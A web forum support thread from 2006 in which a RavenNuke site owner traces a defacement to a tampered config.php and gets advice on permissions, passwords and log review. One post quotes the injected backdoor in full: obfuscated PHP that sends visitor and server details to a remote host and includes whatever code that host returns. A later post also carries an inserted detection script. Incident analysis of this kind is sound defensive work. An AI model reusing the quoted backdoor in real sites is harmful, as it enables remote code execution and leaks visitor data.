Ravens PHP Scripts: Forums
 

 

This forum is locked: you cannot post, reply to, or edit topics.   This topic is locked: you cannot edit posts or make replies.    Ravens PHP Scripts And Web Hosting Forum Index -> Raven's RavenNuke(tm) v2.00.00 - v2.02.00 Distro
gbhughs
Regular

Joined: Sep 11, 2004
Posts: 84

Posted: Mon May 01, 2006 4:26 pm

Somebody hacked my site today and somehow changed the title for every side block, news block, and link titles.

The only 2 blocks that are not affected by this are the Admin block (title is fine) and the Waiting Content block (title is fine).

The Nuke Sentinel tables were screwed up.

The table for nuke_nsnst_tracked_ips did not exist and it said that the table had crashed. So I fixed that table, and I still have the problem.

Here was the error I received for this table
Quote:
Error

SQL query:

SHOW INDEX FROM `nuke_nsnst_tracked_ips` ;

MySQL said:
#1016 - Can't open file: 'nuke_nsnst_tracked_ips.MYI' (errno: 145)



(Link visible only to registered users.) Take a look, and I need suggestions on how to solve this issue.

BTW:

I am using 76v2.02.....

Nuke sentinel v1.1.1(I think, came with the pkg?)

Thanks in advance
 
gbhughs
Posted: Mon May 01, 2006 4:39 pm

Answer to the post below (link visible only to registered users):

Stang5_0 wrote:
FYI

I am now having the same issue when looking with phpMyAdmin, and I have made no changes recently. Can you please PM me the IP if you have one or post it here so we can compare notes?

Thanks,
Stang


The ips I had were:

Quote:
24.196.99.131
63.163.102
69.128.88.22
65.28.206.168
 
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6792
Location: Ha Noi, Viet Nam

Posted: Mon May 01, 2006 5:37 pm

Are you sure you are using Ravenuke? I didn't see any copyright or credit messages.


gbhughs
Posted: Mon May 01, 2006 5:39 pm

I'm sure....

I've discussed the copyright message with Raven
 
Guardian2003
Posted: Mon May 01, 2006 5:48 pm

I see you are already getting support in another thread, did you want to continue with that thread or keep this new one?
 
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

Posted: Mon May 01, 2006 5:49 pm

Well, I've tried in both threads but the Sentinel version you listed is not even close to what comes with RN 2.02. To enable folks to help you here you really need to step back and tell us when and where you downloaded the distribution you are using, what you did to install it and when, and take a look at Sentinel in the admin screen and tell us what the version is.

It sounds like you loaded a Post Nuke (PN?) users table over the top of a RN users table? I can't say how feasible that is but did you load any other tables the same way?
 
gbhughs
Posted: Mon May 01, 2006 5:49 pm

I saw that I posted that one in the wrong area and would like to use this one cause it is where it shoulda been to begin with.
 
gbhughs
Posted: Mon May 01, 2006 5:53 pm

I downloaded this oh about 2 months ago.

I'm sorry, I think I posted the wrong version.

Can I find the version number in here nuke_nsnst_config?

And if so this is what I came up with 2.4.2pl3.

BTW: Bear with me this is kinda new to me.
 
Guardian2003
Posted: Mon May 01, 2006 5:53 pm

OK.
As fkelly pointed out, we now need to establish exactly how you installed RN, if it was a fresh install or old data was transferred etc.
 
gbhughs
Posted: Mon May 01, 2006 5:55 pm

fkelly wrote:
It sounds like you loaded a Post Nuke (PN?) users table over the top of a RN users table? I can't say how feasible that is but did you load any other tables the same way?


I guess, if that is the technical term for this procedure.

I can say yes I added my PN users to this database, but I haven't had any problems with this as of yet and that has been 2 months ago.

One more table I loaded over would be the stories table from an old PHP site (v 6.5 I think)

Other than that nothing else......

Fresh Install
Then I did the other 2 things mentioned above and that was it.
 
gbhughs
Posted: Mon May 01, 2006 7:01 pm

Well I have found the problem.

Somehow, someone was able to tamper with my config.php file.
I uploaded the original and now everything is working.

Now my question is how the h-e-double-L hockey sticks do I prevent this from happening again?
 
Guardian2003
Posted: Mon May 01, 2006 7:30 pm

What did you find in your config.php that had been changed?
Was it the database connection details?
 
kguske
Site Admin


Joined: Jun 04, 2004
Posts: 6383

Posted: Mon May 01, 2006 8:39 pm

Is it possible someone could've guessed an FTP account / password? Public access? Some other way to upload files through a script?

gbhughs
Posted: Mon May 01, 2006 8:52 pm

They added this line at the bottom of the file:
Quote:
error_reporting(0);
// gather host, server name, request URI, user agent, client IP and referer
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
// base64-encode them into a query string
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);
// include_once() a remote URL assembled from base64-decoded pieces ("aHR0cDovLw==" is "http://"),
// i.e. a remote file inclusion that runs whatever the remote host returns on every page load
if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>
 
Guardian2003
Posted: Tue May 02, 2006 7:03 am

What was the chmod set to for that file?
I am just trying to determine whether someone managed to edit (write to) the file directly as part of some cross site scripting attack.

ADMINS, do we want to remove that code and put it in (link visible only to registered users) for further analysis?
 
fkelly
Posted: Tue May 02, 2006 7:18 am

As Kguske pointed out, you should probably be concerned that someone might have administrative access to your site. Assuming you are in a hosted environment you might want to go change the passwords for whatever administrative panel you use and also for any FTP accounts you've set up.

Also, if you can tell when that config.php file was changed (exploited) you might look in your logs around that time and see if there is any suspicious activity.

Your Sentinel version is fairly new though there are some updates available. Just out of curiosity what version of Forums are you using? That should show at the bottom of your forums admin screen.
 
gbhughs
Posted: Tue May 02, 2006 9:49 am

Guardian2003 wrote:
What was the chmod set to for that file?


Well in doing some research I found that the permission was set for "world writable". I have now set this permission at 644.
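An added example, not code from this thread or from RavenNuke: a small POSIX shell audit that looks for the two conditions found here, PHP files left world-writable and PHP files containing an include_once(base64_decode(...)) line, and prints each finding with its modification time so it can be lined up with the logs fkelly mentions. The web root path, and the availability of find, grep and GNU or BSD stat, are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). Audits a web root for world-writable PHP
# files (what allowed config.php to be edited) and for PHP files that include()
# a base64_decode()-built argument, the pattern of the line appended to config.php.
# Assumes POSIX sh, find, grep and GNU or BSD stat; caller supplies the web root.

# Modification time of a file, for correlating with web server / FTP logs.
file_mtime() {
    stat -c '%y' "$1" 2>/dev/null || stat -f '%Sm' "$1"
}

# PHP files under $1 whose permission bits let "other" write them (e.g. 666 / 777).
find_world_writable_php() {
    find "$1" -type f -name '*.php' -perm -o+w
}

# PHP files under $1 that include()/include_once() a base64_decode()-built argument.
# grep -q is used as a per-file test so find's own exit status stays 0 on no match.
find_remote_include_php() {
    find "$1" -type f -name '*.php' \
        -exec grep -qE 'include(_once)?[[:space:]]*\([[:space:]]*base64_decode' {} \; -print
}

# Print one report line per finding with its mtime; return 1 if anything was flagged.
# World-writable files are fixed with chmod 644 (as done in the thread); a file with
# an injected include must be restored from a known-good copy and the upload path traced.
audit_webroot() {
    flagged=0
    ww=$(find_world_writable_php "$1")
    bd=$(find_remote_include_php "$1")
    if [ -n "$ww" ]; then
        flagged=1
        printf '%s\n' "$ww" | while read -r f; do
            printf 'WORLD-WRITABLE  %s  (mtime %s)\n' "$f" "$(file_mtime "$f")"
        done
    fi
    if [ -n "$bd" ]; then
        flagged=1
        printf '%s\n' "$bd" | while read -r f; do
            printf 'REMOTE-INCLUDE  %s  (mtime %s)\n' "$f" "$(file_mtime "$f")"
        done
    fi
    return "$flagged"
}

# Usage: sh audit.sh /path/to/webroot   (non-zero exit means something was flagged)
[ "$#" -gt 0 ] && audit_webroot "$1"
```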
 
gbhughs
Posted: Tue May 02, 2006 9:54 am

fkelly wrote:
As Kguske pointed out, you should probably be concerned that someone might have administrative access to your site. Assuming you are in a hosted environment you might want to go change the passwords for whatever administrative panel you use and also for any FTP accounts you've set up.


I have changed all passwords like you mentioned above.

fkelly wrote:
Also, if you can tell when that config.php file was changed (exploited) you might look in your logs around that time and see if there is any suspicious activity.


We are looking into this.....

fkelly wrote:
Your Sentinel version is fairly new though there are some updates available. Just out of curiosity what version of Forums are you using? That should show at the bottom of your forums admin screen.


I am running phpBB 2.0.19
 
Stang5_0
Hangin' Around


Joined: Oct 17, 2002
Posts: 49
Location: Phoenix, AZ

Posted: Mon May 08, 2006 9:47 am

gbhughs wrote:
Well I have found the problem.

Somehow, someone was able to tamper with my config.php file.
I uploaded the original and now everything is working.

Now my question is how the h-e-double-L hockey sticks do I prevent this from happening again?


I wish mine were that easy. My config.php looks fine, but when I try to go into phpMyAdmin to look at the DBs I get this at the top:

Error

SQL query:

SELECT COUNT( * ) AS num
FROM `sg`.`nuke_nsnst_tracked_ips`

MySQL said:
#1016 - Can't open file: 'nuke_nsnst_tracked_ips.MYD'. (errno: 145)

The last table listed is nuke_nsnst_protected_ranges
I was hoping a new config.php would be the ticket, but I don't think that is true in this case since like I said, mine has not been modified. Any suggestions here guys? I am running the latest package as well from Raven.

Thanks,
Stang
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9449
Location: Arizona

Posted: Tue May 09, 2006 6:04 am

Stang5_0, did you try running a table "repair" on that table or are you completely unable to even do that? You may need to get your ISP to try that for you... not sure why it got this way though.

Stang5_0
Posted: Wed May 10, 2006 9:56 am

Can that be done with phpMyAdmin?
My friend that used to work at the ISP that helped me with this has gone to another place of work and they have yet to find a replacement so at this point, I'm kinda on my own.
 
Powered by phpBB © 2001-2007 phpBB Group